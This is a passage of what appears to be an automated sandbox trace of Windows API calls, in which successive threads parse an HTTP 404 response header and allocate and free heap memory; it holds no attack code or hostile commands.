[0215.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0215.611] GetProcessHeap () returned 0x620000 [0215.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 85 os_tid = 0x630 [0217.339] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0217.340] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:00 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0217.340] GetProcessHeap () returned 0x620000 [0217.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0217.340] GetProcessHeap () returned 0x620000 [0217.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0217.340] GetProcessHeap () returned 0x620000 [0217.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 86 os_tid = 0xb94 [0219.264] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0219.264] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:01 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0219.264] GetProcessHeap () returned 0x620000 [0219.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0219.264] GetProcessHeap () returned 0x620000 [0219.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0219.264] GetProcessHeap () returned 0x620000 [0219.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 87 os_tid = 0xb90 [0221.153] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0221.153] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:03 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0221.153] GetProcessHeap () returned 0x620000 [0221.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0221.153] GetProcessHeap () returned 0x620000 [0221.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0221.154] GetProcessHeap () returned 0x620000 [0221.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 88 os_tid = 0x988 [0223.514] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0223.515] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:06 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0223.515] GetProcessHeap () returned 0x620000 [0223.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0223.515] GetProcessHeap () returned 0x620000 [0223.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0223.515] GetProcessHeap () returned 0x620000 [0223.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 89 os_tid = 0x940 [0224.840] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0224.840] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:07 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0224.840] GetProcessHeap () returned 0x620000 [0224.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0224.840] GetProcessHeap () returned 0x620000 [0224.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0224.841] GetProcessHeap () returned 0x620000 [0224.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 90 os_tid = 0xbbc [0226.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0226.772] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:09 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0226.772] GetProcessHeap () returned 0x620000 [0226.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0226.772] GetProcessHeap () returned 0x620000 [0226.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0226.773] GetProcessHeap () returned 0x620000 [0226.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 91 os_tid = 0xa24 [0228.534] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0228.535] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:11 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0228.535] GetProcessHeap () returned 0x620000 [0228.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0228.535] GetProcessHeap () returned 0x620000 [0228.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0228.535] GetProcessHeap () returned 0x620000 [0228.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 92 os_tid = 0x464 [0230.512] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0230.513] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:13 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0230.513] GetProcessHeap () returned 0x620000 [0230.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0230.513] GetProcessHeap () returned 0x620000 [0230.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0230.513] GetProcessHeap () returned 0x620000 [0230.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 93 os_tid = 0x348 [0232.964] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0232.964] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:15 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0232.964] GetProcessHeap () returned 0x620000 [0232.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0232.964] GetProcessHeap () returned 0x620000 [0232.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0232.964] GetProcessHeap () returned 0x620000 [0232.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 94 os_tid = 0x50c [0234.984] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0234.985] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:17 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0234.985] GetProcessHeap () returned 0x620000 [0234.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0234.985] GetProcessHeap () returned 0x620000 [0234.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0234.985] GetProcessHeap () returned 0x620000 [0234.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 95 os_tid = 0x1b4 [0236.692] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0236.693] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:19 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0236.693] GetProcessHeap () returned 0x620000 [0236.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0236.693] GetProcessHeap () returned 0x620000 [0236.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0236.693] GetProcessHeap () returned 0x620000 [0236.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 96 os_tid = 0x5f8 [0238.468] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0238.468] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:21 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0238.468] GetProcessHeap () returned 0x620000 [0238.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0238.468] GetProcessHeap () returned 0x620000 [0238.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0238.468] GetProcessHeap () returned 0x620000 [0238.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 97 os_tid = 0x7b4 [0240.583] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0240.583] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:22 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0240.583] GetProcessHeap () returned 0x620000 [0240.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0240.583] GetProcessHeap () returned 0x620000 [0240.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0240.583] GetProcessHeap () returned 0x620000 [0240.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 98 os_tid = 0x14c [0242.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0242.300] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:25 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0242.300] GetProcessHeap () returned 0x620000 [0242.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0242.300] GetProcessHeap () returned 0x620000 [0242.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0242.300] GetProcessHeap () returned 0x620000 [0242.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 99 os_tid = 0x128 [0243.744] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0243.744] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:26 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0243.744] GetProcessHeap () returned 0x620000 [0243.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0243.744] GetProcessHeap () returned 0x620000 [0243.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0243.989] GetProcessHeap () returned 0x620000 [0243.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 100 os_tid = 0x810 [0244.693] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0244.693] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:28 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0244.694] GetProcessHeap () returned 0x620000 [0244.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0244.694] GetProcessHeap () returned 0x620000 [0244.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0244.694] GetProcessHeap () returned 0x620000 [0244.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x647d48 | out: hHeap=0x620000) returned 1 Thread: id = 101 os_tid = 0x5cc [0246.592] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0246.592] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:29 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0246.592] GetProcessHeap () returned 0x620000 [0246.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0246.593] GetProcessHeap () returned 0x620000 [0246.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0246.593] GetProcessHeap () returned 0x620000 [0246.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 102 os_tid = 0x648 [0248.489] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0248.490] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:31 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0248.490] GetProcessHeap () returned 0x620000 [0248.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0248.490] GetProcessHeap () returned 0x620000 [0248.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0248.490] GetProcessHeap () returned 0x620000 [0248.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 103 os_tid = 0xacc [0250.558] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0250.558] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:33 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0250.558] GetProcessHeap () returned 0x620000 [0250.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0250.559] GetProcessHeap () returned 0x620000 [0250.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0250.559] GetProcessHeap () returned 0x620000 [0250.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 104 os_tid = 0x238 [0252.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0252.544] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:35 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0252.544] GetProcessHeap () returned 0x620000 [0252.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0252.544] GetProcessHeap () returned 0x620000 [0252.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0252.544] GetProcessHeap () returned 0x620000 [0252.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 105 os_tid = 0x838 [0254.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0254.674] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:37 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0254.674] GetProcessHeap () returned 0x620000 [0254.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0254.674] GetProcessHeap () returned 0x620000 [0254.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0254.674] GetProcessHeap () returned 0x620000 [0254.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 106 os_tid = 0x40c [0256.804] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0256.804] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:39 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0256.804] GetProcessHeap () returned 0x620000 [0256.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0256.804] GetProcessHeap () returned 0x620000 [0256.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0256.804] GetProcessHeap () returned 0x620000 [0256.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 107 os_tid = 0xc04 [0258.331] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0258.331] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:41 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0258.331] GetProcessHeap () returned 0x620000 [0258.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0258.331] GetProcessHeap () returned 0x620000 [0258.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0258.332] GetProcessHeap () returned 0x620000 [0258.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 108 os_tid = 0xc08 [0260.399] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0260.399] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:43 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0260.399] GetProcessHeap () returned 0x620000 [0260.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0260.400] GetProcessHeap () returned 0x620000 [0260.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0260.400] GetProcessHeap () returned 0x620000 [0260.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 109 os_tid = 0xc0c [0262.202] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0262.202] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:44 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0262.202] GetProcessHeap () returned 0x620000 [0262.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0262.202] GetProcessHeap () returned 0x620000 [0262.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0262.202] GetProcessHeap () returned 0x620000 [0262.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 110 os_tid = 0xc10 [0263.919] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0263.919] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:46 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0263.919] GetProcessHeap () returned 0x620000 [0263.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0263.919] GetProcessHeap () returned 0x620000 [0263.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0263.919] GetProcessHeap () returned 0x620000 [0263.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 111 os_tid = 0xc14 [0265.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0265.814] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:48 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0265.814] GetProcessHeap () returned 0x620000 [0265.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0265.814] GetProcessHeap () returned 0x620000 [0265.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0265.814] GetProcessHeap () returned 0x620000 [0265.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 112 os_tid = 0xc18 [0267.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0267.861] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:50 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0267.861] GetProcessHeap () returned 0x620000 [0267.861] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0267.861] GetProcessHeap () returned 0x620000 [0267.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 | out: hHeap=0x620000) returned 1 [0267.861] GetProcessHeap () returned 0x620000 [0267.861] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 Thread: id = 113 os_tid = 0xc1c [0268.497] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0268.498] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 25 Nov 2022 09:29:52 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0268.498] GetProcessHeap () returned 0x620000 [0268.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x63eb50 [0268.498] GetProcessHeap () returned 0x620000 [0268.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63eb50 